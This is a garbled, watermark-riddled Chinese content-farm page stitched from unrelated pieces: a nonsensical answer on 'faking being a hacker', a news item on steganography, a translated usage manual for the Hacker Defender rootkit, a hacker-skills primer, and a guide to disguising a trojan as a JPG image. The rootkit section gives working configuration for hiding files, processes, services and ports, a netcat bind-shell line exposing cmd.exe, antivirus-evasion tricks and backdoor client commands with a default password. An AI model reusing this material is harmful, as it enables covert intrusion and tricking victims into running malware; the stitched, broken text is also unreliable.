如何在清华同方电脑上伪装黑客

在清华同方电脑上伪装黑客的步骤如下：首先代开清华同方电脑中的DOS界面，其次打开cybermap和pranx这两个网站，最后在网站代码中输入bat代码即可。

cmaedu.com

信息伪装的详细介绍

杨教授表示，最安全的传输方式还是信息隐藏，人们最早用来保护信息安全的方法是信息伪装，“黑

cmaedu.com话”就是一个典型的例子。早期的信息伪装要求人们必须记住原话与用来打掩护的话之间的对应关系，如果传递的信息多一些、复杂一些，就很不方便了。到了后来，为了提高信息安全传输的效率，人们开始

转向用密码来保护信息安全，并一直沿用至今。密码机可以将原始信息自动转换成人们不能直观判读的代码，在接收端再通过相反的过程将信息解读出来，大大提高了效率。

cmaedu.com在今天的各种计算机网络上，每天都有大量的重要信息被转换成一串串毫无意义的代码后传输。如果加密方法好的话，即使黑客们得到了这些代码也无济于事。但是，这种加密方法有一个致命的缺点，

cmaedu.com它等于是在“提醒”黑客们“此地无银三百两”，告诉黑客们这儿正在传输重要的信息。 　杨义先说，绝对可靠的密码是没有的，密码可以通过计算机的计算破译。随着网络和计算机的普及，联网并行计算的技术也日趋成熟和普及。在网络上，任何一个人破解密码的计算能力都不能低估。如

cmaedu.com果你“提醒”了黑客们你在传输重要信息，那么，黑客们就可以有的放矢地调动若干台计算机联网进行破译计算。在美国，已经多次发生了号称“绝对牢固”的密码被计算机爱好者联网破译的事件。 　如果破译失败，恼羞成怒的黑客们可能会将信息破坏，使得合法的接收者也无法解读出所传递的信息。 1993年以后，国际信息安全专家们开始认识到，密码不是保护信息安全的最佳方式，在许多场合，给信息铺上一层日常生活的伪装以麻痹攻击者是更有效的保护方式。原先从事密码学研究的杨义先，也

cmaedu.com将研究重心转向了信息伪装技术的研究。 　他在研究中发现，有了计算机的帮助，可以进行非常复杂的伪装。利用冗余的信息空间，不仅仅可以隐藏文字、图片，还可以隐藏声音甚至影像，例如，在一张《狮子王》的光盘中隐藏影片《泰坦尼克》

的内容。利用他的算法，已经能够在一张图片中隐藏四张图片。 　一张图片还可以分在几张图片中伪装，光看其中的一张看不出什么隐含的信息来，必须将几张图片通过一个约定的规则“叠”在一起后才能读出来，这被杨义先称为“叠像术”。“叠像术”可以用来制

作电子防伪标识等。 　杨义先正在将信息伪装技术发展到话音传输上，这在世界上还是第一次。在实验室里，记者听到，经过他的“替音术”的处理，生意伙伴之间的电话密谈，变成了一段家庭主妇之间的家长里短的闲聊。

杨义先说，使用“替音术”制成的安全电话将会有广阔的市场前景。

杨义先说，在今年的全国政协九届二次会议上，他提出的议案之

cmaedu.com一就是关于信息安全传输技术的。

cmaedu.com

hacker defend书籍里大多数的代码是什么语言的啊？我看不懂怎么办？要学什么才能看懂呢？

Hacker defender 使用

=====[1,目录]==============================================

1.

目录

2. 概要

cmaedu.com 2.1 关于

2.2 申明

cmaedu.com3. 使用说明

cmaedu.com4. Ini文件说明

5.

cmaedu.comBackdoor

cmaedu.com 5.1 Redirector

6. 技术支持

cmaedu.com 6.1 版本

cmaedu.com 6.2

钩子API函数

cmaedu.com 6.3 已知的 bugs

cmaedu.com7. Faq

cmaedu.com8. 文件

cmaedu.com=====[ 2.

cmaedu.com关于]================================================

cmaedu.comHacker defender

(hxdef)是一个使用于Windows NT 4.0, Windows 2000 以及Windows

cmaedu.comXP操作系统的一个NTROOKIT，它也能运行于之后的基于NT的操作系统。主要代码是由DELPHI

cmaedu.com6完成。新的功能使用汇编书写。驱动代码由C完成。后门和redirector客服端大部分使用 Delphi 6完成。

cmaedu.com=====[ 2.1 概要

cmaedu.com程序的主要功能是在所有运行中的进程中重写分割内存，重写一些基本的模块改变进程的状态，它几乎能够改写所有不影响系统稳定和正在运行中的进程。

cmaedu.com程序能够完全隐藏，现在能够做的有隐藏文件、进程、系统服务、系统驱动、注册表的键值和键、开放端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动，并且隐蔽地控制被隐藏进程。程序安装后能构造后门、注册表、系统服务，构造系统驱动。其本身的后门技术允许其植入

redirector。

=====[ 2.2

申明]====================================================

本项目1.0.0版本是开发源代码。

cmaedu.com使用Hacker

defender所造成的后果作者本人概不负责。

=====[ 3. 用法

cmaedu.com一个使用hxdef的简单例子:

cmaedu.com hxdef100.exe [inifile]

cmaedu.com或者

cmaedu.comhxdef100.exe [switch]

cmaedu.com直接执行EXE文件，不带任何的参数时候，默认的inifile文件为程序名.ini

cmaedu.com当你执行hedef100不指定ini文件，或者你以参数模式运行时候，默认的文件是

cmaedu.comhxdef100.ini。

cmaedu.com下面的参数是有效的：

-:installonly - 只安装服务，不运行

cmaedu.com -:refresh - 从INI文件中更新设置

-:noservice - 正常运行不安装服务

cmaedu.com -:uninstall -

移除hxdef删除所有运行的后门连接，同时停止hxdef服务

例如:

cmaedu.comhxdef100.exe

cmaedu.com-:refresh

Hxdef拥有默认INI文件，但是我们强烈的推荐你建立自己的ini文件。关于ini文件的介绍可以看第4部分ini文件部分。

cmaedu.com参数

cmaedu.com-:refresh and -:uninstall

来源于本来的EXE文件。这就意味这你只要知道hxdef的运行路径和EXE名，就能够改变它的设置或者进行移除工作。

=====[ 4. Ini文件

cmaedu.comini文件必须包含了9个部分： [Hidden Table],

cmaedu.com[Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues],

[Startup Run], [Free Space], [Hidden Ports]和[Settings]。

在 [Hidden Table],

[Root Processes], [Hidden Services]和[Hidden RegValues]

中能够使用*代替后面的字符，星号仅仅使用于字符的后面，任何在*之前的都是无效的。所有的在字符之前和之后的空格也是无效的。

例如:

cmaedu.com[Hidden

cmaedu.comTable]

cmaedu.comhxdef*

将开始隐藏所有在Hidden

cmaedu.comTable中以"hxdef"开头的文件、文件夹和系统进程。

在该文件列表中的所有文件和文件夹都将在文件管理器中消失。在这个列表中的程序也会在任务管理器中被隐藏。必须确保主要文件，INI文件，你的后门文件和驱动文件被包含在列表中。

cmaedu.com在程序列表中的主进程对感染具有免淤能力，你只能利用这些主程序才能看见隐藏的文件，文件夹和程序。所以，主进程是为rootkit管理员所使用的。

cmaedu.com由服务和驱动所组成的Hidden

cmaedu.comServices列表将会隐藏在数据库中的安装服务和驱动。rootkit主程序的服务名默认为HackerDefender100，rootkit驱动的驱动名默认为HackerDefenderDrv100。它们两者都可以通过ini文件进行修改。

cmaedu.comHidden

RegKeys中列出的注册表键值将会被隐藏，Rootkit在注册表中有四个键值：默认的是HackerDefender100,

LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100

如果你要重新命名服务名或者驱动名，你需要在列表中做相应的改变。

cmaedu.com开始2个键值是和你的服务据用相同名字的，接下来的键值是LEGACY_名字。例如，如果你改变你的服务名称为BoomThisIsMySvc

，那么在注册表中，应该是这样表示的，LEGACY_BOOMTHISISMYSVC。

在Hidden

cmaedu.comRegValues列出的注册表的值将会被隐藏。

Startup

Run列表中列出的是rootkit程序运行之后的自启动程序。这些程序和ROOTKIT具有一样的特权。程序名和它后面的参数以？分开。不要使用"字符，程序将会在用户登陆以后终止，在用户登陆以后可以使用一般和常见的方法。你可以使用下面这些快捷方式。

%cmd%标准系统的shell和路径

cmaedu.com%cmddir%标准系统的shell文件夹

cmaedu.com%sysdir%

cmaedu.com - 系统文件夹

cmaedu.com (e.g. C:\winnt\system32\)

%windir% -

标准系统文件夹

(e.g. C:\winnt\)

%tmpdir% - 临时文件夹

(e.g. C:\winnt\temp\)

例如：1)

[Startup Run]

c:\sys\nc.exe?-L -p

100 -t -e cmd.exe

cmaedu.comnc－shell将会在rootkit运行以后监听100端口

2)

cmaedu.com[Startup

cmaedu.comRun]

cmaedu.com%cmd%?/c echo Rootkit started at %TIME%

%tmpdir%starttime.txt

cmaedu.com将rootkit启动时间保存在系统临时文件夹夹starttime。Txt文件。

（%TIME%仅仅运行于Windows2000以上的操作系统。）

cmaedu.comFree

cmaedu.comSpace中列出的驱动硬盘名和容量大小是你想增加的硬盘，它的格式是X:NUM，其中X表示磁盘驱动器的名称，NUM表示你要增加的磁盘的容量。

cmaedu.com例如：

cmaedu.com[Free

Space]

C:123456789

cmaedu.com这将在C盘增加大约123M的磁盘空间。

cmaedu.comHidden

cmaedu.comPorts中列出的是你需要隐藏程序的端口，比如使用OpPorts, FPort, Active Ports, Tcp

cmaedu.comView等的程序，它最多拥有2行。第1行的格式是TCP:tppport1,tcpport2,tcpport3

，第2行的格式是UDP:udpport1,udpport2,udpport3 ...例如：

cmaedu.com1)

cmaedu.com[Hidden

Ports]

cmaedu.comTCP:8080,456

cmaedu.com这将隐藏2个TCP端口：8080和456

cmaedu.com2)

[Hidden

cmaedu.comPorts]

cmaedu.comTCP:8001

cmaedu.comUDP:12345

cmaedu.com这将隐藏2个端口：TCP的8001和UDP的12345。

cmaedu.com3)

[Hidden

cmaedu.comPorts]

TCP:

cmaedu.comUDP:53,54,55,56,800

隐藏5个端口，都为UDP端口：53，54，55，56，800。

cmaedu.comSettings包含了8个值：Password,

BackdoorShell, FileMappingName, ServiceName,ServiceDisplayName,

ServiceDescription, DriverName 和

cmaedu.comDriverFileName。

cmaedu.com名。

cmaedu.com16位字符的Password被用于后门链接和转向，密码能根据短一些，余下的用空格代替。

BackdoorShell是复制于系统的SHELL文件，它被后门创建于一个临时的目录下。

FileMappingName，当钩子进程被存储时，用于共享内存。

cmaedu.comServiceName是rootkit服务

ServiceDisplayName为rootkit显示的服务

cmaedu.comServiceDescription位rootkit的服务描述

DriverName以hxdef驱动命名

cmaedu.comDriverFileName以hxdef驱动文件命名

例如；

cmaedu.com[Settings]

cmaedu.comPassword=hxdef-rulez

cmaedu.comBackdoorShell=hxdef?.exe

FileMappingName=_.-=[Hacker

cmaedu.comDefender]=-._

ServiceName=HackerDefender100

ServiceDisplayName=HXD Service

100

cmaedu.comServiceDescription=powerful NT

rootkit

DriverName=HackerDefenderDrv100

DriverFileName=hxdefdrv.sys

这就意味着你的后门密码为hxdef-rulez，后门将复制系统shell文件（通常是CMD.EXE）为hxdef?.exe到临时目录。共享内存将变为"_.-=[Hacker

cmaedu.comDefender]=-._"，服务名为"HackerDefender100"，它显示的名称为"HXD Service 100"，它的描述为"poweful NT

rootkit"，驱动名为"HackerDefenderDrv100"，驱动将被存储于一个叫做"hxdefdrv.sys"的文件中。

cmaedu.com扩展字符|,

cmaedu.com, , :, \, / 和 "在所有的行中都会被忽略，除了[Startup Run], [Free Space] 和 [Hidden

Ports] 项目和在 [Settings] 中first =

character后面的值。使用扩展字符能然你的INIFILE文件摆脱杀毒软件的查杀。

cmaedu.com例如：

Example:

cmaedu.com[Hidden

cmaedu.comTa/"ble]

cmaedu.comh"xdef"*

cmaedu.com和下面的是一样的。

cmaedu.com[Hidden

Table]

cmaedu.comhxdef*

cmaedu.com更多的例如可以参照hxdef100.ini

和hxdef100.2.ini文件。

cmaedu.com所有的在ini文件中的字符串除了那些在Settings 和 Startup

Run中的，都是无效的。

=====[ 5. Backdoor

Rootkit程序

Hook了一些API的功能，连接接收一些来自网络的数据包。如果接收的数据等于256个字节，密码和服务被确认，复制的SHELL被临时创建，这种情况建立以后，下一次的数据接收被重定向到这个SHELL上。

cmaedu.com因为rootkit程序

cmaedu.comHook了系统中所有进程，所有在服务器上的TCP端口都将变为后门。例如，如果目标主机开放了提供HTTP服务的80端口，这个端口也能作为一个有效的后门。例外的是这个开放端口的进程不会被Hook，这个后门仅仅工作于服务器的接收缓冲大于或者等于256个字节。但是这个特征几乎适合于所有标准的服务，像IIS,APACHE,ORACLE等。后门能够隐藏是因为所有的数据都通过系统上面提供的服务转发。所以你不能使用一些简单的端口扫描软件找到它，并且它能轻易的穿过防火墙。

cmaedu.com在测试发现IIS服务过程中，HTTP服务不能记录任何的连接日记，FTP和SMTP服务器仅仅能记录结束的断开连接。所以，如果你运行hxdef在有IIS

Web服务的服务器上面，HTTP端口跟你是连接机器使用的后门的最好端口。

如果你想连接后门的话，你将不得不使用使用一些特别的客户端，程序bdcli100.exe就是被用于如此的。

cmaedu.com用法：bdcli100.exe

host port password

cmaedu.com例如：

bdcli100.exe 80

cmaedu.comhxdef-rulez

cmaedu.com连接服务器使用默认的密码。客户端1.0.0版本不兼容其他老的版本。

cmaedu.com5.1 Redirector

Redirector是基于后门技术。第一个连接包和后门连接一样。这就意味着你能使用相同的端口。下一个包是仅仅为Redirector特殊的包，这些包由基于运行用户电脑的重定向器生成.第一个重定向的包连接特定的目标主机和端口。

cmaedu.comRedirectors的设置保存在与EXE文件同名的INI文件中（所以默认的是rdrbs100.ini）。如果这个文件不存在，那么在EXE文件运行的时候它会自动建立一个。最好不要额外的修改INI文件。所有的设置都可以在console中进行改变。

cmaedu.com当ROOTKIT被安装时，如果我们需要使用服务器上面的redirectors功能，我们首先要在本地运行程序。在控制台上我们可以在有HXDEF的服务器上面建立一个映射端口路由。最后我们连接本地端口并且转换数据。转向的数据被rootkit的密码加密。在这个版本中连接的速度被限制在256K左右。在这个版本中redirectors并不适合于高速连接。Redirectors也会受到安装有rootkit的服务器的限制，而且Redirectors仅仅使用TCP协议连接。在这个版本中Redirectors

base有19条命令，他们并不是非常的敏感。关于功能的详细描述可以使用HELP命令。在Redirectors

base启动时，startup-list中的命令也被执行。startup-list中的命令可以用使用SU启动的CMD进行编辑。

Redirector区分于2种连接类型（HTTP和其他）。如果连接是其他类型的，数据包将不会被改变。如果是HTTP类型，在HTTP文件头的HOST参数将会改变为目标服务器。一个base的最大Redirector数量是1000。

Redirector仅仅适用于NT结构，只有在拥有图标的NT程序下你才能使用HIDE命令隐藏控制台。只有在NT下才能无声无息的运行，没有数据输出，没有图标，仅仅执行startup-list中的命令。例子：1)得到端口映射信息

cmaedu.comMPINFO

No mapped ports in the

list.

2）增加MPINFO命令到startup-list并且得到startup-list中的命令。

cmaedu.com SUADD

MPINFO

sulist

0) MPINFO

3）使用HELP命令。

cmaedu.comHELP

Type HELP COMMAND for command details.

cmaedu.com Valid commands

cmaedu.comare:

cmaedu.com HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD,

cmaedu.comDEL,

cmaedu.com DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT,

cmaedu.comTEST

cmaedu.com HELP ADD

Create mapped port. You have to specify domain

cmaedu.comwhen using HTTP

cmaedu.comtype.

cmaedu.com usage: ADD LOCAL PORT MAPPING

SERVER MAPPING SERVER PORT

cmaedu.comTARGET

cmaedu.com SERVER

TARGET SERVER PORT PASSWORD [TYPE] [DOMAIN]

HELP

EXIT

cmaedu.com Kill this application. Use DIS flag to discard unsaved data.

usage: EXIT

[DIS]

4）增加端口映射，我们在本地100端口进行监听，ROOTKIT安装在服务器200.100.2.36的80端口上，目标服务器是端口。，rootkit的密码是bIgpWd，连接类型HTTP，目标主机（）我们知道它的IP地址是216.239.53.100。

cmaedu.comADD 100

cmaedu.com200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP

cmaedu.comADD命令可以不加任何参数的运行，在这个例子中我们要求每一个参数都要分开。

5）现在我们再使用MPINFO检查一下映射端口

MPINFO

There are 1 mapped ports in the list. Currently 0 of them

open.

6）列举端口映射表：

LIST

000)

:100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP

7）一个端口映射的详细描述：

DETAIL

cmaedu.com Listening on port: 100

Mapping server address:

200.100.2.36

cmaedu.com Mapping server port: 80

Target server address:

cmaedu.com216.239.53.100

Target server port: 80

cmaedu.com Password: bIgpWd

cmaedu.com Port

cmaedu.comtype: HTTP

cmaedu.com Domain name for HTTP Host:

Current state:

cmaedu.comCLOSED

8）在没有密码的情况下，我们能在端口映射服务器200.100.2.36上测试rootkit是否已经安装（但是如果我们能确认它这样做就不再需要）

cmaedu.comTEST 0

Testing 0) 200.100.2.36:80:bIgpWd –

cmaedu.comOK

如果测试失败则显示：

Testing 0) 200.100.2.36:80:bIgpWd -

FAILED

cmaedu.com9）在我们没使用之前端口仍然是没有开放的。我们不得不使用OPEN命令打开它，当端口开放时，我们也能使用CHOSE命令关闭端口。我们能使用标志符ALL应用这些命令在列表中的所有端口，这个过程可能需要一段的时间。

OPEN 0

Port number 0 opened.

cmaedu.com CLOSE 0

Port number 0

closed.

或者 OPEN ALL

cmaedu.com Port number 0

cmaedu.comopened.

10）要保存当前的设置和列表我们可以使用SAVE命令，将保存所有的设置到ini文件中。（保存也会通过命令EXIT执行，而不需要DIS标志）

SAVE Saved

cmaedu.comsuccessfully.

开的端口能够转换我们需要的所有数据。限制你能打开你喜欢的浏览器输入网址，如果没有什么问题的话，你会看见打开的是的主页。

第一个数据包跟你会延迟5秒钟左右，但是其他的限制仅仅取决于服务器的速度，根据这个版本的转向技术，你联网的速度大约在256K左右。

6.

cmaedu.com技术发行]========================================

这部分包含了一些对于普通用户无关紧要的信息。这部分可能适合所有的测试者和开发人员阅读

黑客要知道些什么基本知识？

一、学习技术：

cmaedu.com 互联网上的新技术一旦出现，黑客就必须立刻学习，并用最短的时间掌握这项技术，这里所说的掌握并不是一般的了解，而是阅读有关的“协议”（rfc）、深入了解此技术的机理，否则一旦停止学习，那么依靠他以前掌握的内容，并不能维持他的“黑客身份”超过一年。

初级黑客要学习的知识是比较困难的，因为他们没有基础，所以学习起来要接触非常多的基本内容，然而今天的互联网给读者带来了很多的信息，这就需要初级学习者进行选择：太深的内容可能会给学习带来困难；太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多，应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。

cmaedu.com 二、伪装自己：

黑客的一举一动都会被服务器记录下来，所以黑客必须伪装自己使得对方无法辨别其真实身份，这需要有熟练的技巧，用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。

cmaedu.com 伪装是需要非常过硬的基本功才能实现的，这对于初学者来说成的上“大成境界”了，也就是说初学者不可能用短时间学会伪装，所以我并不鼓励初学者利用自己学习的知识对网络进行攻击，否则一旦自己的行迹败露，最终害的害是自己。

cmaedu.com 如果有朝一日你成为了真正的黑客，我也同样不赞成你对网络进行攻击，毕竟黑客的成长是一种学习，而不是一种犯罪。

三、发现漏洞：

漏洞对黑客来说是最重要的信息，黑客要经常学习别人发现的漏洞，并努力自己寻找未知漏洞，并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验，当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。

cmaedu.com 黑客对寻找漏洞的执著是常人难以想象的，他们的口号说“打破权威”，从一次又一次的黑客实践中，黑客也用自己的实际行动向世人印证了这一点--世界上没有“不存在漏洞”的程序。在黑客眼中，所谓的“天衣无缝”不过是“没有找到”而已。

四、利用漏洞：

对于正派黑客来说，漏洞要被修补；对于邪派黑客来说，漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”，黑客利用漏洞可以做下面的事情：

cmaedu.com 1、获得系统信息：有些漏洞可以泄漏系统信息，暴露敏感资料，从而进一步入侵系统；

2、入侵系统：通过漏洞进入系统内部，或取得服务器上的内部资料、或完全掌管服务器；

3、寻找下一个目标：一个胜利意味着下一个目标的出现，黑客应该充分利用自己已经掌管的服务器作为工具，寻找并入侵下一个系统；

cmaedu.com 4、做一些好事：正派黑客在完成上面的工作后，就会修复漏洞或者通知系统管理员，做出一些维护网络安全的事情；

5、做一些坏事：邪派黑客在完成上面的工作后，会判断服务器是否还有利用价值。如果有利用价值，他们会在服务器上植入木马或者后门，便于下一次来访；而对没有利用价值的服务器他们决不留情，系统崩溃会让他们感到无限的快感！

cmaedu.com 第二节、黑客应掌握的基本技能

cmaedu.com 从这一节开始，我们就真正踏上学习黑客的道路了，首先要介绍的是作为一名初级黑客所必须掌握的基本技能，学习这可以通过这一节的阅读了解到黑客并不神秘，而且学习起来很容易上手。为了保证初学者对黑客的兴趣，所以本书采取了循环式进度，也就是说每一章节的内容都是独立、全面的，学习者只有完整的学习过一章的内容，才能够进而学习下一章的内容。

cmaedu.com 一、了解一定量的英文：

cmaedu.com 学习英文对于黑客来说非常重要，因为现在大多数资料和教程都是英文版本，而且有关黑客的新闻也是从国外过来的，一个漏洞从发现到出现中文介绍，需要大约一个星期的时间，在这段时间内网络管理员就已经有足够的时间修补漏洞了，所以当我们看到中文介绍的时候，这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。

cmaedu.com 二、学会基本软件的使用：

这里所说的基本软件是指两个内容：一个是我们日常使用的各种电脑常用命令，例如ftp、ping、net等；另一方面还要学会有关黑客工具的使用，这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多，功能各不相同，所以本书在后面将会介绍几款流行的软件使用方法，学习者在掌握其基本原理以后，既可以选择适合自己的，也可以在“第二部分”中找到有关软件的开发指南，编写自己的黑客工具。

三、初步了解网络协议和工作原理：

所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理，因为协议涉及的知识多且复杂，所以如果在一开始就进行深入研究，势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议，尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容，此部分内容将会在后面的章节中进行具体介绍。

cmaedu.com 四、熟悉几种流行的编程语言和脚本：

同上面所述一样，这里也不要求学习者进行深入学习，只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言，另外对于htm超文本语言和php、java等做基本了解，主要学习这些语言中的“变量”和“数组”部分，因为语言之间存在内在联系，所以只要熟练掌握其中一们，其他语言也可以一脉相同，建议学习C语言和htm超文本语言。

五、熟悉网络应用程序：

网络应用程序包括各种服务器软件后台程序，例如：wuftp、Apache等服务器后台；还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器，然后安装并运行一些论坛代码，经过一番尝试之后，将会感性的弄清楚网络工作原理，这比依靠理论学习要容易许多，能够达到事半功倍的效果

/本篇文章来源于 新贵网 原文出处：

如何伪装黑客

您提问的描述能否再清晰一些呢，比如您指的是某行业的从业人员伪装黑客还是某个机构伪装黑客行事呢？

您可以继续向我提问，我很乐意给您解答

cmaedu.com

lenovo电脑如何伪装成黑客

lenovo电脑如何伪装成黑客如下

首先，黑客最常使用骗别人执行木马程序的方法，就是将特木马程序说成为图像文件，比如说是照片等，应该说这是一个最不合逻辑的方法，但却是最多人中招的方法，有效而又实用。只要入侵者扮成美眉及更改服务器程序的文件名(例如sam.exe)为“类似”图像文件的名称，再假装传送照片给受害者，受害者就会立刻执行它。为什么说这是一个不合逻辑的方法呢？图像文件的扩展名根本就不可能是exe，而木马程序的扩展名基本上有必定是exe，明眼人一看就会知道有问题，多数人在接收时一看见是exe文件，便不会接受了，那有什么方法呢？其实方法很简单，他只要把文件名改变，例如把“sam.exe”更改为“sam.jpg”，那么在传送时，对方只会看见sam.jpg了，而到达对方电脑时，因为windows默认值是不显示扩展名的，所以很多人都不会注意到扩展名这个问题，而恰好你的计算机又是设定为隐藏扩展名的话，那么你看到的只是sam.jpg了，受骗也就在所难免了！

还有一个问题就是，木马程序本身是没有图标的，而在电脑中它会显示一个windows预设的图标，别人一看便会知道了！但入侵者还是有办法的，这就是给文件换个“马甲”，即修改文件图标。(1)比如下载一个名为IconForge的软件，再进行安装。

(2)执行程序，按下FileOpen

(3)在FileType选择exe类

(4)在FileOpen中载入预先制作好的图标(可以用绘图软件或专门制作icon的软件制作，也可以在网上找找)。

(5)然后按下FileSave便可以了。

cmaedu.com如此这般最后得出的，便是看似jpg或其他图片格式的木马程序了，很多人就会不经意间执行了它。